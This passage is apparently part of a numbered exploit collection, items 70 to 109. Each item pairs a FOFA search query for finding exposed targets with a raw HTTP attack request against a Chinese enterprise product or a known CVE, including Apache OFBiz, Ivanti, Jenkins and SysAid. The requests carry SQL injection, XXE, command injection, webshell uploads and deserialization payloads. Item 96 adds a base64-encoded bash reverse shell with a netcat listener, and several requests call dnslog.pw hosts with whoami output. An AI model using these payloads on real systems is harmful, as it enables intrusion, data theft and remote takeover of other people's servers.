* S' R/ O( v& _0 f- a) d6 RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 y9 t- |$ h5 g/ rAccept-Encoding: gzip, deflate" e; g5 ]( G$ C' e) p% R  ?
Accept: */*
! ?6 M9 `, Q7 R5 y5 `# MConnection: keep-alive
) e' m* J. o& X" j. G* A+ |
) @8 d1 w, L# ^1 v/ s
70. 万户ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技视频监控 (Uniview) main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin NetGod SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the XML file content; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

